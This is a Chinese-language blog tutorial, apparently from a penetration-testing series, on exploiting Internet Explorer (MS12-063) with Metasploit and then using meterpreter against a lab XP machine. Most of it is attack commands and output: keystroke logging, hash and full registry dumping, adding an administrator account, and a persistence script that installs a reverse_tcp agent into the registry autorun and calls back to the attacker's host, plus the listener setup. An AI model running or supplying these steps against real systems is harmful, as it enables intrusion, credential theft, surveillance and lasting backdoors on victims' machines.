内网渗透二：meterpreter的一些利用

最新推荐文章于 2024-05-30 22:07:23 发布

Xysoul

最新推荐文章于 2024-05-30 22:07:23 发布

阅读量2.1k

点赞数

分类专栏：网络安全

网络安全专栏收录该内容

55 篇文章 7 订阅

订阅专栏

0x01填坑：

我在这里填一下上一篇文章中的坑哈：

我们使用了exploit/windows/browser/ie_execcommand_uaf IE浏览器的这个EXP，但是执行之后发现目标主机虽然跳转了，但是有个报错：

（接第一篇）靶机被强行跳转到被监听的URL

MSF成功监听到

（但，貌似是虚拟机装的XP把这个漏洞补了，所以没产生session会话）

过后查了这个原因好久，在Mickey牛的教导下，终于发现了报错的原因：

msf下输入 exploit/windows/browser/ie_execcommand_uaf

0x02找到问题：

执行info，查看该EXP的信息，发现这个EXP原来是针对XP SP3、Vista的IE7、IE8以及Win7的IE8、IE9。

 
          msf exploit(ie_execcommand_uaf) > info 
         
          Name: MS12- 
          063 
           Microsoft Internet Explorer execCommand Use-After-Free Vulnerability  
         
          Module: exploit/windows/browser/ie_execcommand_uaf 
         
          Platform: Windows 
         
          Privileged: No 
         
          License: Metasploit Framework License (BSD) 
         
          Rank: Good 
         
          Provided by: 
         
          unknown 
         
          eromang 
         
          binjo 
         
          sinn3r <sinn3r 
          @metasploit 
          .com> 
         
          juan vazquez <juan.vazquez 
          @metasploit 
          .com> 
         
          Available targets: 
         
          Id  Name 
         
          --  ---- 
         
          0   
           Automatic 
         
          1   
           IE  
          7 
           on Windows XP SP3 
         
          2   
           IE  
          8 
           on Windows XP SP3 
         
          3   
           IE  
          7 
           on Windows Vista 
         
          4   
           IE  
          8 
           on Windows Vista 
         
          5   
           IE  
          8 
           on Windows  
          7 
         
          6   
           IE  
          9 
           on Windows  
          7 
         
          Basic options: 
         
          Name        Current Setting  Required  Description 
         
          ----        ---------------  --------  ----------- 
         
          OBFUSCATE    
          false            
           no        Enable JavaScript obfuscation 
         
          SRVHOST      
          172.16 
          . 
          244.129   
           yes       The local host to listen on. This must be an address on the local machine or  
          0.0 
          . 
          0.0 
         
          SRVPORT      
          8080             
           yes       The local port to listen on. 
         
          SSL          
          false            
           no        Negotiate SSL  
          for 
           incoming connections 
         
          SSLCert                      no        Path to a custom SSL certificate ( 
          default 
           is randomly generated) 
         
          SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) 
         
          URIPATH                      no        The URI to use  
          for 
           this 
           exploit ( 
          default 
           is random) 
         
          Payload information: 
         
          Description: 
         
          This module exploits a vulnerability found in Microsoft Internet  
         
          Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object  
         
          gets deleted in an unexpected manner, but the same memory is reused  
         
          again later in the CMshtmlEd::Exec() function, leading to a  
         
          use-after-free condition. Please note that  
          this 
           vulnerability has  
         
          been exploited in the wild since Sep  
          14 
           2012 
          . Also note that  
         
          presently,  
          this 
           module has some target dependencies  
          for 
           the ROP  
         
          chain to be valid. For WinXP SP3 with IE8, msvcrt must be present  
         
          (as it is by  
          default 
          ). For Vista or Win7 with IE8, or Win7 with IE9,  
         
          JRE  
          1.6 
          .x or below must be installed (which is often the  
          case 
          ).

然后默默地去下载了XP SP3、安装IE7（刚安装好的XP SP3使用的是IE6）

（安装、重启、重新操作了第一篇里的步骤 So 省略若干字….）

0x03 EXP successful：

终于，返回了successful！

sessions：
sessions -i 1

sysinfo ipconfig ps hashdump…

0x04常用命令：

截屏：

screenshot

键盘记录：

 
          meterpreter > run post/windows/capture/keylog_recorder 
         
          [*] Executing module against SPRITEKI- 
          674621 
         
          [*] Starting the keystroke sniffer... 
         
          [*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172. 
          16.244 
          .136_host.windows.key_879494.txt 
         
          [*] Recording keystrokes... 
         
          ^C[*] Saving last few keystrokes... 
         
          [*] Interrupt 
         
          [*] Stopping keystroke sniffer...

执行cmd:

meterpreter>shell
添加用户：

net user add name password /add
添加用户到管理组：

net localgroup administrator name /add

因为是内网开启3389也没什么意义了

Kill 杀软

1

meterpreter > run scraper [*] New session on 172.16.244.136:1114... [*] Gathering basic system information... [*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied. [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg) [*] Cleaning HKU [*] Completed processing on 172.16.244.136:1114...

控制持久化

 
          meterpreter > run persistence -X -i  
          20 
           3376 
           -r  
          172.16 
          . 
          244.129 
         
 
          [*] Running Persistance Script 
         
 
          [*] Resource file  
          for 
           cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315. 
          5511 
          /SPRITEKI-674621_20150315. 
          5511 
          .rc 
         
 
          [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= 
          172.16 
          . 
          244.129 
           LPORT= 
          4444 
         
 
          [*] Persistent agent script is  
          609466 
           bytes  
          long 
         
 
          [+] Persistent Script written to C:\DOCUME~ 
          1 
          \ADMINI~ 
          1 
          \LOCALS~ 
          1 
          \Temp\lBsbPnkcYJvv.vbs 
         
 
          [*] Executing script C:\DOCUME~ 
          1 
          \ADMINI~ 
          1 
          \LOCALS~ 
          1 
          \Temp\lBsbPnkcYJvv.vbs 
         
 
          [+] Agent executed with PID  
          1112 
         
 
          [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI 
         
 
          [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI 
         

use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPOTR exploit

在meterpreter下使用Windows API编程，以弹Hello world窗示例

1

2

3

4

 
          meterpreter > irb 
         
 
          [*] Starting IRB shell 
         
 
          [*] The  
          'client' 
           variable holds the meterpreter client 
         
 
          >> client.railgun.user32.MessageBoxA( 
          0 
          , 
          "hello" 
          , 
          "world" 
          , 
          "MB_OK" 
          ) 
         